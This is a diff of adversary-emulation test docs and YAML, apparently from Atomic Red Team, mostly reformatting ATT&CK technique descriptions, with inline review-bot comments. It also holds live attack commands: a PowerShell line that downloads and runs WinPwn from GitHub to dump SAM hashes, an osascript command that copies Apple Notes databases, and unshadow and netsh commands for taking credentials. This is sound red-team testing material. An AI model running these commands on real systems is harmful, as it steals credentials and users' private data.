Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
@@ -21,6 +23,8 @@ Notes:
* RID 500 account is the local, built-in administrator.
* RID 501 is the guest account.
* User accounts start with a RID of 1,000+.
</blockquote>
## Atomic Tests
@@ -332,7 +336,6 @@ Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive
```
-1
@@ -168,7 +168,6 @@ atomic_tests:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive
name: powershell
+5 -1
@@ -1,6 +1,8 @@
# T1003.003 - OS Credential Dumping: NTDS
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/003)
<blockquote>Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\NTDS\Ntds.dit</code> of a domain controller.(Citation: Wikipedia Active Directory)
<blockquote>
Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\NTDS\Ntds.dit</code> of a domain controller.(Citation: Wikipedia Active Directory)
In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
@@ -10,6 +12,8 @@ The following tools and techniques can be used to enumerate the NTDS file and th
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
</blockquote>
## Atomic Tests
+6 -2
@@ -1,8 +1,12 @@
# T1003.004 - OS Credential Dumping: LSA Secrets
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/004)
<blockquote>Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
<blockquote>
[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)</blockquote>
Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)
</blockquote>
## Atomic Tests
+6 -2
@@ -1,6 +1,8 @@
# T1003.005 - OS Credential Dumping: Cached Domain Credentials
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/005)
<blockquote>Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)
<blockquote>
Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)
On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)
@@ -8,7 +10,9 @@ On Linux systems, Active Directory credentials can be accessed through caches ma
With SYSTEM or sudo access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py for Windows or Linikatz for Linux can be used to extract the cached credentials.(Citation: Brining MimiKatz to Unix)
Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)</blockquote>
Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)
</blockquote>
## Atomic Tests
+6 -2
@@ -1,10 +1,14 @@
# T1003.006 - OS Credential Dumping: DCSync
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/006)
<blockquote>Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
<blockquote>
Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)
DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)</blockquote>
DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)
</blockquote>
## Atomic Tests
+6 -2
@@ -1,10 +1,14 @@
# T1003.007 - OS Credential Dumping: Proc Filesystem
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/007)
<blockquote>Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the processs virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the processs virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
<blockquote>
Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the processs virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the processs virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns indicative of credentials. Adversaries may use regex patterns, such as <code>grep -E "^[0-9a-f-]* r" /proc/"$pid"/maps | cut -d' ' -f 1</code>, to look for fixed strings in memory structures or cached hashes.(Citation: atomic-red proc file system) When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the processs memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook)
If running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.</blockquote>
If running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.
</blockquote>
## Atomic Tests
+5 -1
@@ -1,8 +1,12 @@
# T1003.008 - OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/008)
<blockquote>Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
<blockquote>
Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) <code># /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db</code>
</blockquote>
## Atomic Tests
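Review bot: the only change in this hunk, and in every other technique index hunk in this compare, is that the `<blockquote>` and `</blockquote>` tags move onto their own lines around an otherwise unchanged ATT&CK description; these Markdown files are produced by the docs generator (see the `Generated docs from job=generate-docs` commits in this range), so the change must come from the generator template, otherwise the next generated-docs commit will rewrite the files back. The unresolved `(Citation: ...)` markers are carried over from the ATT&CK import unchanged and are not introduced here.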
+5 -1
View File
@@ -1,8 +1,12 @@
# T1003 - OS Credential Dumping
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003)
<blockquote>Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
<blockquote>
Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
</blockquote>
## Atomic Tests
+44 -1
View File
@@ -1,8 +1,12 @@
# T1005 - Data from Local System
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1005)
<blockquote>Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
<blockquote>
Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
</blockquote>
## Atomic Tests
@@ -11,6 +15,8 @@ Adversaries may do this using a [Command and Scripting Interpreter](https://atta
- [Atomic Test #2 - Find and dump sqlite databases (Linux)](#atomic-test-2---find-and-dump-sqlite-databases-linux)
- [Atomic Test #3 - Copy Apple Notes database files using AppleScript](#atomic-test-3---copy-apple-notes-database-files-using-applescript)
<br/>
@@ -134,4 +140,41 @@ if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then yum update -y && yu
<br/>
<br/>
## Atomic Test #3 - Copy Apple Notes database files using AppleScript
This command will copy Apple Notes database files using AppleScript as seen in Atomic Stealer.
**Supported Platforms:** macOS
**auto_generated_guid:** cfb6d400-a269-4c06-a347-6d88d584d5f7
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| destination_path | Specify the path to copy the database files into. | path | /private/tmp|
#### Attack Commands: Run with `sh`!
```sh
osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'
```
#### Cleanup Commands:
```sh
rm "#{destination_path}/NoteStore.sqlite*"
```
<br/>
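Review bot: the cleanup command for Test #3, `rm "#{destination_path}/NoteStore.sqlite*"`, quotes the glob, so the shell passes a literal `*` to `rm` and none of the three copied files (NoteStore.sqlite, NoteStore.sqlite-shm, NoteStore.sqlite-wal) are removed from the destination; move the wildcard outside the quotes, e.g. `rm -f "#{destination_path}"/NoteStore.sqlite*`, and make the change in the YAML source since this Markdown is generated. The description names Atomic Stealer but carries no reference link the way the VIM-CMD test further down does; adding one would let readers verify the attributed behaviour.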
+18
View File
@@ -88,3 +88,21 @@ atomic_tests:
rm -f $HOME/.art
rm -f $HOME/gta.db
rm -f $HOME/sqlite_dump.sh
- name: Copy Apple Notes database files using AppleScript
auto_generated_guid: cfb6d400-a269-4c06-a347-6d88d584d5f7
description: |
This command will copy Apple Notes database files using AppleScript as seen in Atomic Stealer.
supported_platforms:
- macos
input_arguments:
destination_path:
description: Specify the path to copy the database files into.
type: path
default: /private/tmp
executor:
command: |-
osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'
cleanup_command: 'rm "#{destination_path}/NoteStore.sqlite*"'
name: sh
elevation_required: false
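Review bot: `cleanup_command: 'rm "#{destination_path}/NoteStore.sqlite*"'` has the quoted-glob problem at the source: with the `*` inside the double quotes, `rm` looks for a file literally named `NoteStore.sqlite*` and the copied database files stay behind in the default `/private/tmp`. Suggest `cleanup_command: 'rm -f "#{destination_path}"/NoteStore.sqlite*'` here, which is what the rendered docs are regenerated from.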
+6 -2
View File
@@ -1,8 +1,12 @@
# T1006 - Direct Volume Access
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1006)
<blockquote>Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)
<blockquote>
Utilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)</blockquote>
Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)
Utilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)
</blockquote>
## Atomic Tests
+6 -2
View File
@@ -1,8 +1,12 @@
# T1007 - System Service Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1007)
<blockquote>Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.
<blockquote>
Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</blockquote>
Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.
Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
</blockquote>
## Atomic Tests
+6 -2
View File
@@ -1,8 +1,12 @@
# T1010 - Application Window Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1010)
<blockquote>Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
<blockquote>
Adversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) commands and [Native API](https://attack.mitre.org/techniques/T1106) functions.</blockquote>
Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
Adversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) commands and [Native API](https://attack.mitre.org/techniques/T1106) functions.
</blockquote>
## Atomic Tests
+6 -2
View File
@@ -1,8 +1,12 @@
# T1012 - Query Registry
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1012)
<blockquote>Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
<blockquote>
The Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</blockquote>
Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
The Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
</blockquote>
## Atomic Tests
+6 -2
View File
@@ -1,8 +1,12 @@
# T1014 - Rootkit
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1014)
<blockquote>Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits)
<blockquote>
Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)</blockquote>
Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits)
Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)
</blockquote>
## Atomic Tests
+7 -3
View File
@@ -1,8 +1,12 @@
# T1016.001 - System Network Configuration Discovery: Internet Connection Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1016/001)
<blockquote>Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites.
<blockquote>
Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.</blockquote>
Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites.
Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.
</blockquote>
## Atomic Tests
@@ -74,7 +78,7 @@ Check internet connection using ping on Linux, MACOS. The default target of the
```bash
ping -n 4 #{ping_target}
ping -c 4 #{ping_target}
```
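Review bot: replacing `ping -n 4` with `ping -c 4` is the right fix for this `bash` block (the hunk header context says Linux, macOS): on those platforms `-n` means numeric output rather than a packet count, so the old command would keep pinging until interrupted, while `-c 4` stops after four packets as the test intends.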
+1 -1
View File
@@ -33,7 +33,7 @@ atomic_tests:
name: bash
elevation_required: false
command: |
ping -n 4 #{ping_target}
ping -c 4 #{ping_target}
- name: Check internet connection using Test-NetConnection in PowerShell (ICMP-Ping)
auto_generated_guid: f8160cde-4e16-4c8b-8450-6042d5363eb0
description: |
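Review bot: this YAML is the source the generated Markdown above is built from, and the `command:` block carries the same `-n 4` to `-c 4` change under the `bash` executor, so the two stay consistent; nothing further needed here.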
+5 -1
View File
@@ -1,10 +1,14 @@
# T1016.002 - System Network Configuration Discovery: Wi-Fi Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1016/002)
<blockquote>Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
<blockquote>
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
Adversaries may collect various types of information about Wi-Fi networks from hosts. For example, on Windows names and passwords of all Wi-Fi networks a device has previously connected to may be available through `netsh wlan show profiles` to enumerate Wi-Fi names and then `netsh wlan show profile “Wi-Fi name” key=clear` to show a Wi-Fi networks corresponding password.(Citation: BleepingComputer Agent Tesla steal wifi passwords)(Citation: Malware Bytes New AgentTesla variant steals WiFi credentials)(Citation: Check Point APT35 CharmPower January 2022) Additionally, names and other details of locally reachable Wi-Fi networks can be discovered using calls to `wlanAPI.dll` [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: Binary Defense Emotes Wi-Fi Spreader)
On Linux, names and passwords of all Wi-Fi-networks a device has previously connected to may be available in files under ` /etc/NetworkManager/system-connections/`.(Citation: Wi-Fi Password of All Connected Networks in Windows/Linux) On macOS, the password of a known Wi-Fi may be identified with ` security find-generic-password -wa wifiname` (requires admin username/password).(Citation: Find Wi-Fi Password on Mac)
</blockquote>
## Atomic Tests
+6 -2
View File
@@ -1,10 +1,14 @@
# T1016 - System Network Configuration Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1016)
<blockquote>Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
<blockquote>
Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion )
Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. </blockquote>
Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.
</blockquote>
## Atomic Tests
+5 -1
View File
@@ -1,10 +1,14 @@
# T1018 - Remote System Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1018)
<blockquote>Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or <code>net view</code> using [Net](https://attack.mitre.org/software/S0039).
<blockquote>
Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or <code>net view</code> using [Net](https://attack.mitre.org/software/S0039).
Adversaries may also analyze data from local host files (ex: <code>C:\Windows\System32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.
Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. <code>show cdp neighbors</code>, <code>show arp</code>).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)
</blockquote>
## Atomic Tests
+6 -2
View File
@@ -1,8 +1,12 @@
# T1020 - Automated Exfiltration
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1020)
<blockquote>Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020)
<blockquote>
When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).</blockquote>
Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020)
When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).
</blockquote>
## Atomic Tests
+6 -2
View File
@@ -1,10 +1,14 @@
# T1021.001 - Remote Services: Remote Desktop Protocol
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/001)
<blockquote>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
<blockquote>
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)
Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)</blockquote>
Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)
</blockquote>
## Atomic Tests
+6 -2
View File
@@ -1,10 +1,14 @@
# T1021.002 - Remote Services: SMB/Windows Admin Shares
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/002)
